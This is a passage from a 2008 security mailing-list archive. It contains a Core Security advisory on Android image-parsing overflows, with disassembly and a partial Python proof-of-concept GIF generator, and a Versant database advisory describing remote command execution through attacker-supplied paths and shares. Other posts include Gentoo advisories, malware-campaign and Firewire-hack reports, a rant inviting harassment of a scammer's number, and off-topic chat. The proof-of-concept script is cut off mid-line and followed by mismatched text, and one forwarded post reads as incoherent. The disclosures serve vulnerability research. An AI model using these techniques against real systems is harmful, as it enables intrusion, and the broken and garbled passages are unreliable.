operating system, a set of core libraries, application development
frameworks, a virtual machine for executing applications and a phone
emulator based on the QEMU emulator [4]. Public reports as of February
27th, 2008 state that the Android SDK has been downloaded 750,000 times
since November 2007 [5].

Several vulnerabilities have been found in Android's core libraries for
processing graphic content in some of the most used image formats (PNG,
GIF and BMP). While some of these vulnerabilities stem from the use of
outdated and vulnerable open source image processing libraries, others
were introduced by native Android code that uses them or that implements
new functionality.

Exploitation of these vulnerabilities to yield complete control of a
phone running the Android platform has been proved possible using the
emulator included in the SDK, which emulates a phone running the Android
platform on an ARM microprocessor.

This advisory contains technical descriptions of these security bugs,
including a proof of concept exploit to run arbitrary code, proving the
possibility of running code on the Android stack (over an ARM
architecture) via a binary exploit.

*Vulnerable Packages*

. Android SDK m3-rc37a and earlier are vulnerable to several bugs in
components that process GIF, PNG and BMP images (bugs #1, #2 and #3 of
this advisory).
.
Android SDK m5-rc14 is vulnerable to a security bug in the component
that processes BMP images (bug #3).

*Non-vulnerable Packages*

. Android SDK m5-rc15

*Vendor Information, Solutions and Workarounds*

Vendor statement:

"The current version of the Android SDK is an early look release to the
open source community, provided so that developers can begin working
with the platform to inform and shape our development of Android toward
production readiness. The Open Handset Alliance welcomes input from the
security community throughout this process. There will be many changes
and updates to the platform before Android is ready for end users,
including a full security review."

*Credits*

These vulnerabilities were discovered by Alfredo Ortega from Core
Security Technologies, leading his Bugweek 2007 team called "Pampa
Grande". It was researched in depth by Alfredo Ortega.

*Technical Description / Proof of Concept Code*

Android is a software stack for mobile devices that includes an
operating system, middleware and key applications. Android relies on
Linux version 2.6 for core system services such as security, memory
management, process management, network stack, and driver model. The
kernel also acts as an abstraction layer between the hardware and the
rest of the software stack.

The WebKit application framework is included to facilitate development
of web client application functionality. The framework in turn uses
different third-party open source libraries to implement processing of
several image formats.

Android includes a web browser based on the WebKit framework that
contains multiple binary vulnerabilities when processing .GIF, .PNG and
.BMP image files, allowing malicious client-side attacks on the web
browser. A client-side attack could be launched from a malicious web
site, hosting specially crafted content, with the possibility of
executing arbitrary code on the victim's Android system.
These client-side binary vulnerabilities were discovered using the
Android SDK that includes an ARM architecture emulator. Binary
vulnerabilities are the most common security bugs in computer software.
Basic bibliography on these vulnerabilities includes a recently updated
handbook about security holes that also describes current
state-of-the-art exploitation techniques for different hardware
platforms and operating systems [6].

The vulnerabilities discovered are summarized below grouped by the type
of image file format that is parsed by the vulnerable component.

#1 - GIF image parsing heap overflow

The Graphics Interchange Format (GIF) is an image format dating at least
from 1989 [7]. It was popularized because GIF images can be compressed
using the Lempel-Ziv-Welch (LZW) compression technique thus reducing the
memory footprint and bandwidth required for transmission and storage.

A memory corruption condition happens within the GIF processing library
of the WebKit framework when the function 'GIFImageDecoder::onDecode()'
allocates a heap buffer based on the _Logical Screen Width and Height_
field of the GIF header (offsets 6 and 8) and then the resulting buffer
is filled in with an amount of data bytes that is calculated based on
the real Width and Height of the GIF image.

There is a similar (if not the same) bug in the function
'GIFImageDecoder::haveDecodedRow()' in the open-source version included
by Android in
'WebKitLib\WebKit\WebCore\platform\image-decoders\gif\GifImageDecoder.cpp'
inside 'webkit-522-android-m3-rc20.tar.gz' available at [8].

Detailed analysis:

When the process 'com.google.android.browser' must handle content with a
GIF file it loads a dynamic library called 'libsgl.so' which contains
the decoders for multiple image file formats. Decoding of the GIF image
is performed correctly by the library giflib 4.0 (compiled inside
'libsgl.so'). However, the wrapper object 'GIFImageDecoder'
miscalculates the total size of the image.
First, the Logical Screen Size is read and stored in the following
calling sequence (as giflib is an Open Source MIT-licenced library, the
source was available for analysis):
'GIFImageDecoder::onDecode()->DGifOpen()->DGifGetScreenDesc()'.

The last function, 'DGifGetScreenDesc()', stores the _Logical Screen
Width and Height_ in a structure called 'GifFileType':

/-----------
int DGifGetScreenDesc(GifFileType * GifFile)
{
    ...
    /* Put the screen descriptor into the file: */
    if (DGifGetWord(GifFile, &GifFile->SWidth) == GIF_ERROR ||
        DGifGetWord(GifFile, &GifFile->SHeight) == GIF_ERROR)
        return GIF_ERROR;
    ...
}
-----------/

We can see that the fields are stored in the first 2 words of the
structure:

/-----------
typedef struct GifFileType {
    /* Screen dimensions. */
    GifWord SWidth, SHeight,
    ...
}
-----------/

In the disassembly of the GIFImageDecoder::onDecode() function provided
below we can see how the DGifOpen() function is called and that the
return value (a GifFileType struct) is stored on the $R5 ARM register:

/-----------
.text:0002F234    BL      _DGifOpen
.text:0002F238    SUBS    R5, R0, #0    ; GifFile -> $R5
-----------/

Then, the giflib function 'DGifSlurp()' is called and the Image size is
correctly allocated using the Image Width and Height and not the Logical
Screen Size:

/-----------
int DGifSlurp(GifFileType * GifFile)
{
    ...
    ImageSize = sp->ImageDesc.Width * sp->ImageDesc.Height;
    sp->RasterBits = (unsigned char *)malloc(ImageSize * sizeof(GifPixelType));
    ...
}
-----------/

Afterwards the _Logical Screen_ Width and Height are stored in the R9
and R11 registers:

/-----------
.text:0002F28C    LDMIA   R5, {R9,R11}    ; R9=SWidth R11=SHeight !
-----------/

However the actual image may be much larger than these sizes that are
incorrectly passed to a number of methods of the 'GIFImageDecoder':

/-----------
ImageDecoder::chooseFromOneChoice():

.text:0002F294    MOV     R0, R8
.text:0002F298    MOV     R1, #3
.text:0002F29C    MOV     R2, R9
.text:0002F2A0    MOV     R3, R11
.text:0002F2A4    STR     R12, [SP,#0x48+var_3C]
.text:0002F2A8    BL      _ImageDecoder19chooseFromOneChoice ; ImageDecoder::chooseFromOneChoice(SkBitmap::Config,int,int)

Bitmap::setConfig():

.text:0002F2B8    MOV     R0, R7          ; R7 = SkBitmap
.text:0002F2BC    MOV     R1, #3
.text:0002F2C0    MOV     R2, R9          ; R9=SWidth R11=SHeight !
.text:0002F2C4    MOV     R3, R11
.text:0002F2C8    STR     R10, [SP,#0x48+var_48]
.text:0002F2CC    BL      _Bitmap9setConfig ; Bitmap::setConfig(SkBitmap::Config,uint,uint,uint)
-----------/

This function stores the SWidth and SHeight inside the Bitmap object as
shown in the following code snippet:

/-----------
.text:00035C38    MOV     R7, R2    ; $R2 = SWidth, goes to $R7
.text:00035C3C    MOV     R8, R3    ; $R3 = SHeight, goes to $R8
.text:00035C40    MOV     R4, R0    ; $R4 = *Bitmap
-----------/

And later:

/-----------
.text:00035C58    BL      _Bitmap15ComputeRowBytes ; SkBitmap::ComputeRowBytes(SkBitmap::Config,uint)
.text:00035C5C    MOV     R5, R0           ; $R5 = Real Row Bytes
.text:00035C68    STRH    R7, [R4,#0x18]   ; *Bitmap+0x18 = SWidth
.text:00035C6C    STRH    R8, [R4,#0x1A]   ; *Bitmap+0x1A = SHeight
.text:00035C60    STRH    R5, [R4,#0x1C]   ; *Bitmap+0x1C = Row Bytes
-----------/

The following python script generates a GIF file that causes the
overflow. It requires the Python Imaging Library.
Once the GIF file is generated, it must be opened in the Android browser
to trigger the overflow:

/-----------
##Android Heap Overflow
##Ortega Alfredo _ Core Security Exploit Writers Team
##tested against Android SDK m3-rc37a

import Image
import struct

#Creates a _good_ gif image
imagename='overflow.gif'
str = '\x00\x00\x00\x00'*30000
im = Image.frombuffer('L',(len(str),1),str,'raw','L',0,1)
im.save(imagename,'GIF')

#Shrink the Logical screen dimension
SWidth=1
SHeight=1
img = open(imagename,'rb').read()
img = img[:6]+struct.pack('
-----------/

Because the exploit needs to fill over 16 MB of heap memory to reach the
address '0xffffff' it is very slow and the default memory configuration
of Android will often abort the process before reaching the desired
point. To overcome this limitation for demonstration purposes one can
launch the emulator with these parameters:

'emulator -qemu -m 192'

That will launch the Android emulator with 192 megabytes of memory,
plenty for the exploit to work.

This security bug affects Android SDK m5-rc14 and earlier versions.

*Report Timeline*

. 2008-01-30: Vendor is notified that possibly exploitable
vulnerabilities were discovered and that an advisory draft is available.
This affects Android SDK m3-rc37a and earlier versions.
. 2008-01-30: Vendor acknowledges and requests the draft.
. 2008-01-31: Core sends the draft encrypted, including PoC code to
generate malformed GIF images.
. 2008-01-31: Vendor acknowledges the draft.
. 2008-02-02: Vendor notifies that the software is an early release for
the open source community, but agrees they can fix the problem on the
estimated date (2008-02-25).
. 2008-02-04: Core notifies the vendor that Android is using a
vulnerable PNG processing library.
. 2008-02-08: Vendor acknowledges, invites Core to send any new findings
and asks if all findings will be included in the advisory.
.
2008-02-12: Core responds to vendor that all security issues found will
be included in the advisory; the date is subject to coordination.
. 2008-02-12: Vendor releases version m5-rc14 of the Android SDK. Core
receives no notification.
. 2008-02-13: Core sends the vendor more malformed images, including
GIF, PNG and BMP files. Only the BMP file affects the m5-rc14 release.
. 2008-02-20: Core sends to the vendor a new version of the advisory,
including a BMP PoC that runs arbitrary ARM code and informs the vendor
that we noticed that the recent m5-rc14 release fixed the GIF and PNG
bugs. Publication of CORE-2008-0124 has been re-scheduled for February
27th, 2008.
. 2008-02-21: Vendor confirms that the GIF and PNG fixes have been
released and provides an official statement to the "Vendor Section" of
the advisory. A final review of the advisory is requested before its
release. The vendor indicates that the Android SDK is still in
development and stabilization won't happen until it gets closer to
Alpha. Changes to fix the BMP issue are coming soon, priorities are
given to issues listed in the public issue tracking system at
http://code.google.com/p/android/issues .
. 2008-02-26: Core indicates that publication of CORE-2008-0124 has
been moved to March 3rd 2008, asks if an estimated date for the BMP fix
is available and if Core should file the reported and any future bugs
in the public issue tracking page.
. 2008-02-29: Final draft version of advisory CORE-2008-0124 is sent to
the vendor as requested. Core requests for any additional comments or
statements to be provided by noon March 3rd, 2008 (UTC-5).
. 2008-03-01: Vendor requests publication to be delayed one day in
order to publish a new release of Android with a fix to the BMP issue.
. 2008-03-02: Core agrees to delay publication for one day.
. 2008-03-03: Vendor releases Android SDK m5-rc15 which fixes the BMP
vulnerability.
Vendor indicates that Android applications run with the credentials of
an unprivileged user which decreases the severity of the issues found.
. 2008-03-04: Further research by Alfredo Ortega reveals that although
the vendor statement is correct, current versions of Android SDK ship
with a passwordless root account. Unprivileged users with shell access
can simply use the 'su' program to gain privileges.
. 2008-03-04: Advisory CORE-2008-0124 is published.

*References*

[1] Android Overview - Open Handset Alliance -
http://www.openhandsetalliance.com/android_overview.html
[2] "Android Comes to Life in Barcelona" - The Washington Post,
February 11th, 2008 -
http://www.washingtonpost.com/wp-dyn/content/article/2008/02/11/AR2008021101944.html
[3] Android Developer Challenge - http://code.google.com/android/adc.html
[4] "Test Center Preview: Inside Google's Mobile future" - Infoworld,
Feb. 27th 2008 -
http://www.infoworld.com/article/08/02/27/09TC-google-android_1.html
[5] "'Allo, 'allo, Android" - The Sydney Morning Herald, February 26th,
2008 -
http://www.smh.com.au/news/biztech/allo-allo-android/2008/02/26/1203788290737.html
[6] The Shellcoder's Handbook: Discovering and Exploiting Security Holes
by Chris Anley, John Heasman, Felix Linder and Gerardo Richarte. Wiley;
2nd edition (August 20, 2007) -
http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html
[7] Graphics Interchange Format version 89a -
http://www.w3.org/Graphics/GIF/spec-gif89a.txt
[8] Android downloads page - http://code.google.com/p/android/downloads/list
[9] Portable Network Graphics (PNG) specification - http://www.w3.org/TR/PNG/
[10] Bitmap File Structures - http://www.digicamsoft.com/bmp/bmp.html

*About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. CoreLabs regularly publishes security
advisories, technical papers, project information and shared software
tools for public use at: http://www.coresecurity.com/corelabs/.

*About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.

*Disclaimer*

The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.

*GPG/PGP Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHzZRwyNibggitWa0RAjbdAJ9YztTFlDK9a3YOxAx5avoXQV5LhgCeMs6I
teV3ahcSAUFEtsaRCeXVuN8=
=u35s
-----END PGP SIGNATURE-----

From stuart at cyberdelix.net Tue Mar 4 19:23:14 2008
From: stuart at cyberdelix.net (lsi)
Date: Tue, 04 Mar 2008 19:23:14 -0000
Subject: [Full-disclosure] lets go vishing
Message-ID: <47CDA1A2.14414.1BA737E@stuart.cyberdelix.net>

[19:15] lsi2lsi: hiya! ... so i was nearly vished today ...
[19:16] lsi2lsi: mobile rings - hello, we're calling from Lloyds TSB, if you are not [name], you must press 2
[19:16] lsi2lsi: if you ARE [name], please press 1
[19:17] lsi2lsi: ..etc.. i went to bank - they'd never heard of such a thing
[19:17] lsi2lsi: fucking scammers
[19:17] lsi2lsi: so its an automated thing - and it's called me 4 times today
[19:17] lsi2lsi: i looked on the net - cant immediately find someone to shut down their 0845 number
[19:18] lsi2lsi: if they call me a few more times, i might go to the cops
[19:18] lsi2lsi: before that tho, i think i'll have some fun with their machine, and post the gory details onto the "full disclosure" list on the net (a security conference, global, unmoderated)
[19:19] lsi2lsi: together with the num, so all my friends and colleagues can enjoy the machine as well
[19:19] lsi2lsi: hopefully they will get hammered by some freak on the list
[19:20] lsi2lsi: fucking scammers!!!
[19:20] lsi2lsi: it's 0845-331-2320 if u want to play :)
[19:20] lsi2lsi: could be lotsa fun .. ;)
[19:21] lsi2lsi: in fact, im gonna post this whole thing to full disclosure right now.... that's +44-845-331-2320 for non-UK folks...
---
Stuart Udall
stuart at at cyberdelix.dot net - http://www.cyberdelix.net/

---
* Origin: lsi: revolution through evolution (192:168/0.2)

From davidaitel at gmail.com Tue Mar 4 19:47:58 2008
From: davidaitel at gmail.com (Dave Aitel)
Date: Wed, 5 Mar 2008 06:47:58 +1100
Subject: [Full-disclosure] [DailyDave] I like to read
Message-ID: <8cedf8300803041147s4fddf89bj128107f3680fa62f@mail.gmail.com>

[Forwarded from DailyDave]

Tom Clancy just writes about how cool the Catholic religion is. His
latest novel is all about someone trying to talk about format strings
and buffer overflows, you can call them "fish." I've read Dawson's Creek
novels that were better written. Now, telling the public the truth about
RPC is that until you find out you've actually been owned at least he
wrote about sex.

Here's me preparing to RPC fuzz Exchange 2003. Does anyone see anything
interesting in this industry? In a way, I think it's funny that there's
a new binary, then you're stuck. But with Windows, even accessing a file
or directory was present. Remotely, with no authentication. This is the
secret to open source security. It's only until their payroll
spreadsheets get posted to full disclosure that they get all outraged
and start trying to resolve this issue for the art, and prevents stupid
and harmful things like OIS from gaining traction. This isn't related to
security in any way. Basically it was at all interesting, but there are
people on this list off the companies.
- -dave

From aluigi at autistici.org Tue Mar 4 20:55:45 2008
From: aluigi at autistici.org (Luigi Auriemma)
Date: Tue, 4 Mar 2008 21:55:45 +0100
Subject: [Full-disclosure] Arbitrary commands execution in Versant Object Database 7.0.1.3
Message-ID: <20080304215545.7d4bce93.aluigi@autistici.org>

#######################################################################

                             Luigi Auriemma

Application:  Versant Object Database
              http://www.versant.com/en_US/products/objectdatabase
Versions:     <= 7.0.1.3
Platforms:    Windows, Solaris, HP-UX, AIX, Linux
Bug:          arbitrary commands execution
Exploitation: remote
Date:         04 Mar 2008
Author:       Luigi Auriemma
              e-mail: aluigi at autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

From vendor's website:
"The Versant Object Database is the market leader in object databases.
Using Versant Object Database for data storage brings powerful
advantages to applications that use complex C++ and Java object models,
have high concurrency requirements, and large data sets. The Versant
Object Database is designed to handle the navigational access, seamless
data distribution, and enterprise scale often required by these
applications."

The Versant server is also used in other stand-alone products like, for
example, Borland CaliberRM which naturally are vulnerable too.

#######################################################################

======
2) Bug
======

VersantD is the service used for managing the Versant database and by
default listens on port 5019 with the subsequent assigning of a new port
after a client connects to it, so the client connects to port 5019 where
it is handled by the ss.exe process and after the initial exchange of
data the connection continues on the new port.
The first incredible thing which happens when a client connects is that
the full paths which will be used by the server to launch the needed
programs or locate the database files are passed directly by the same
client. That means for example that if a client passes c:\folder in the
VERSANT_ROOT field, the server will run (in case the "-utility" command
is used) "c:\folder\bin\obe.exe -version 7.0.1 -dbtype + -nettype 2
-arch 11 -utility -soc 220 o_oscp" through the vs_prgExecAsync function.

Then using a custom command value (in the place of the "-utility" shown
before) beginning with the "..\" pattern for removing the "\bin\" folder
added by the server forces it to execute not only a custom executable
decided by the attacker but also any additional argument too.

Naturally it is also possible to execute remote commands not available
on the server through, for example, the Windows shares simply using
\\myhost\myfolder as path.

So, summing up, through the Versant server an attacker can execute any
local or remote custom command.

The following is the full command-line executed through a custom command
value (in my proof-of-concept there is the explanation of all the
fields) with the parameters supplied by the client in upper case:

"VERSANT_ROOT\bin\OUR_COMMAND OUR_ARGUMENTS -noprint -username
VERSANT_USER -release VERSANT_REL -rootpath VERSANT_ROOT -dbpath
VERSANT_DB -dbidpath VERSANT_DBID -dbidnode VERSANT_DBID_NODE
DATABASE_NAME -posterrstk"

It's enough to use a line-feed at the end of our arguments for dropping
all the useless stuff which starts from "-noprint".

Note: all the tests have been performed on the Windows version of the
server so the exploitation could differ a bit on the other supported
platforms.
#######################################################################

===========
3) The Code
===========

http://aluigi.org/poc/versantcmd.zip

#######################################################################

======
4) Fix
======

No fix

#######################################################################

---
Luigi Auriemma
http://aluigi.org

From py at gentoo.org Tue Mar 4 22:38:56 2008
From: py at gentoo.org (Pierre-Yves Rofes)
Date: Tue, 04 Mar 2008 23:38:56 +0100
Subject: [Full-disclosure] [ GLSA 200803-08 ] Win32 binary codecs: Multiple vulnerabilities
Message-ID: <47CDCF80.700@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                    Gentoo Linux Security Advisory                GLSA 200803-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Win32 binary codecs: Multiple vulnerabilities
      Date: March 04, 2008
      Bugs: #150288
        ID: 200803-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities in the Win32 codecs for Linux may result in the remote execution of arbitrary code.

Background
==========

Win32 binary codecs provide support for video and audio playback.

Affected packages
=================

    -------------------------------------------------------------------
     Package                  /  Vulnerable   /          Unaffected
    -------------------------------------------------------------------
  1  media-libs/win32codecs     < 20071007-r2          >= 20071007-r2

Description
===========

Multiple buffer overflow, heap overflow, and integer overflow vulnerabilities were discovered in the Quicktime plugin when processing MOV, FLC, SGI, H.264 and FPX files.
Impact
======

A remote attacker could entice a user to open a specially crafted video file, possibly resulting in the remote execution of arbitrary code with the privileges of the user running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Win32 binary codecs users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-libs/win32codecs-20071007-r2"

Note: Since no updated binary versions have been released, the Quicktime libraries have been removed from the package. Please use the free alternative Quicktime implementations within VLC, MPlayer or Xine for playback.

References
==========

  [ 1 ] CVE-2006-4382
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4382
  [ 2 ] CVE-2006-4384
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4384
  [ 3 ] CVE-2006-4385
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4385
  [ 4 ] CVE-2006-4386
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4386
  [ 5 ] CVE-2006-4388
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4388
  [ 6 ] CVE-2006-4389
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4389
  [ 7 ] CVE-2007-4674
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4674
  [ 8 ] CVE-2007-6166
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6166

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200803-08.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

From ivanhec at gmail.com Tue Mar 4 21:57:00 2008
From: ivanhec at gmail.com (Ivan .)
Date: Wed, 5 Mar 2008 08:57:00 +1100
Subject: [Full-disclosure] Hack into a Windows PC - no password needed
Message-ID: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com>

http://www.smh.com.au/news/security/hack-into-a-windows-pc--no-password-needed/2008/03/04/1204402423638.html

From py at gentoo.org Tue Mar 4 23:03:04 2008
From: py at gentoo.org (Pierre-Yves Rofes)
Date: Wed, 05 Mar 2008 00:03:04 +0100
Subject: [Full-disclosure] [ GLSA 200803-09 ] Opera: Multiple vulnerabilities
Message-ID: <47CDD528.1090907@gentoo.org>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                    Gentoo Linux Security Advisory                GLSA 200803-09
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Opera: Multiple vulnerabilities
      Date: March 04, 2008
      Bugs: #210260
        ID: 200803-09

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been discovered in Opera, allowing for file disclosure, privilege escalation and Cross-Site scripting.

Background
==========

Opera is a fast web browser that is available free of charge.
Affected packages
=================

    -------------------------------------------------------------------
     Package                  /  Vulnerable   /          Unaffected
    -------------------------------------------------------------------
  1  www-client/opera               < 9.26                   >= 9.26

Description
===========

Mozilla discovered that Opera does not handle input to file form fields properly, allowing scripts to manipulate the file path (CVE-2008-1080). Max Leonov found out that image comments might be treated as scripts, and run within the wrong security context (CVE-2008-1081). Arnaud reported that a wrong representation of DOM attribute values of imported XML documents allows them to bypass sanitization filters (CVE-2008-1082).

Impact
======

A remote attacker could entice a user to upload a file with a known path by entering text into a specially crafted form, to execute scripts outside intended security boundaries and conduct Cross-Site Scripting attacks.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Opera users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=www-client/opera-9.26"

References
==========

  [ 1 ] CVE-2008-1080
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1080
  [ 2 ] CVE-2008-1081
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1081
  [ 3 ] CVE-2008-1082
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1082

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200803-09.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

From foojipe at gmail.com Tue Mar 4 23:33:27 2008
From: foojipe at gmail.com (jipe foo)
Date: Wed, 5 Mar 2008 00:33:27 +0100
Subject: [Full-disclosure] Hack into a Windows PC - no password needed
In-Reply-To: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com>
References: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com>
Message-ID: <16cd6eab0803041533g35c228a3l1c8cdd3e106e1d26@mail.gmail.com>

2008/3/4, Ivan . :
> http://www.smh.com.au/news/security/hack-into-a-windows-pc--no-password-needed/2008/03/04/1204402423638.html
>

Here is a (totally unofficial) mirror of Metlstorm's files in case you can't reach his overloaded website :-\

http://www.hotsecuritynews.com/fearwire/

Again, very nice work Metlstorm!

From steven at securityzone.org Tue Mar 4 23:41:39 2008
From: steven at securityzone.org (Steven Adair)
Date: Tue, 4 Mar 2008 18:41:39 -0500 (EST)
Subject: [Full-disclosure] Hack into a Windows PC - no password needed
In-Reply-To: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com>
References: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com>
Message-ID: <4160.65.88.218.157.1204674099.squirrel@slashmail.org>

I guess the release of this tool makes physical access pen-tests a little bit easier, huh? Will have to try this out some time.

Steven

> http://www.smh.com.au/news/security/hack-into-a-windows-pc--no-password-needed/2008/03/04/1204402423638.html
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From dancho.danchev at gmail.com Tue Mar 4 15:52:58 2008
From: dancho.danchev at gmail.com (Dancho Danchev)
Date: Tue, 4 Mar 2008 07:52:58 -0800
Subject: [Full-disclosure] ZDNet Asia and TorrentReactor IFRAME-ed
Message-ID:

An in-depth overview of a currently active malware IFRAME campaign that's targeting ZDNet Asia and TorrentReactor's search engine optimization practices of generating and locally caching the search query pages, thereby positioning the now cached popular keywords with the IFRAME between the first ten to twenty search results, taking advantage of the sites' high page ranks. The current state of the exploitation technique used allows the malicious parties to basically inject as many, and as diverse, keywords as they like, presumably taking advantage of today's world events. Sample redirects led me to known Russian Business Network netblocks and ex-customers in the form of rogue anti-virus and anti-spyware applications, as well as fake codecs.

http://ddanchev.blogspot.com/2008/03/zdnet-asia-and-torrentreactor-iframe-ed.html

Regards

--
Dancho Danchev
Cyber Threats Analyst/Blogger
http://ddanchev.blogspot.com
http://windowsecurity.com/Dancho_Danchev

From Larry at larryseltzer.com Wed Mar 5 00:00:33 2008
From: Larry at larryseltzer.com (Larry Seltzer)
Date: Tue, 4 Mar 2008 19:00:33 -0500
Subject: [Full-disclosure] Hack into a Windows PC - no password needed
In-Reply-To: <16cd6eab0803041533g35c228a3l1c8cdd3e106e1d26@mail.gmail.com>
References: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com> <16cd6eab0803041533g35c228a3l1c8cdd3e106e1d26@mail.gmail.com>
Message-ID: <0273B67044957C41BD71D12EBA2E00AE252ECB@becca.LarrySeltzer.local>

The key to the vulnerability:

"To use the tool, hackers must connect a Linux-based computer to a Firewire port on the target machine.
The machine is then tricked into allowing the attacking computer to have read and write access to its memory."

I assume this makes it a local login, not a domain login.

"Paul Ducklin, head of technology for security firm Sophos, said the security hole found by Boileau was not a vulnerability or bug in the traditional sense, because the ability to use the Firewire port to access a computer's memory was actually a feature of Firewire."

So does the same capability exist on Macs?

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blogs.pcmag.com/securitywatch/
Contributing Editor, PC Magazine
larry.seltzer at ziffdavisenterprise.com

From worriedsecurity at googlemail.com Wed Mar 5 02:13:00 2008
From: worriedsecurity at googlemail.com (worried security)
Date: Wed, 5 Mar 2008 02:13:00 +0000
Subject: [Full-disclosure] us cyber command
In-Reply-To: <67ea64530803030631q251a404biaa3f3007f2098757@mail.gmail.com>
References: <67ea64530803030631q251a404biaa3f3007f2098757@mail.gmail.com>
Message-ID: <67ea64530803041813sc0f1027vfc6cbcd9ad588c22@mail.gmail.com>

On Mon, Mar 3, 2008 at 2:31 PM, worried security wrote:
> [02:40] do you think cyber terrorism is real or is it just the
> government softening ppl up for a couple of false flags for a reason
> to bomb iran?
> [02:49] the u.s are still deciding where to build the cyber
> command, so don't expect any die hard style false flags till 2009
> [02:50] they said their false flag cyber command would be up
> and running by december 2008
> [02:50] so they will test out their capabilities probably 2009/10
>

Mar 03 22:50:50 bunch of skript kiddos with DDoS nets... this is why ppl will stop posting vulnerabilities to mailing lists, so the enemy can't use it against their countries
Mar 03 22:51:10 huh?
Mar 03 22:53:22 for instance do you think UK/china/iran hackers are going to keep posting vulnerabilities to mailing lists just so the script kids at the US cyber command can copy and paste the code to black out our electricity grids etc?
Mar 03 22:53:25 http://www.ktbs.com/news/Ad-promote-Cyber-command-9337/
Mar 03 22:54:00 we will stop feeding the mailing lists the "cyber ammo" so the us cyber command can't attack our countries
Mar 03 22:55:25 the us cyber command are advertising a cyber war on news articles, but do they realise what will happen if there is a cyber war? no one will post to the mailing lists anymore.
Mar 03 22:55:55 the us government are the biggest dumb asses who don't think things through
Mar 03 22:56:24 it will stop new techniques getting publicly disclosed etc
Mar 03 22:56:44 because non-US hackers don't want to give the US gov ideas on how to hack non-US countries
Mar 03 22:57:07 we're already in a cyber war.
Mar 03 22:57:23 so i hope the fucking us gov cyber command have good security researchers to find their own vulns and techniques
Mar 03 22:57:49 cos their enemies won't post on the mailing lists if cities start getting blacked out by US gov
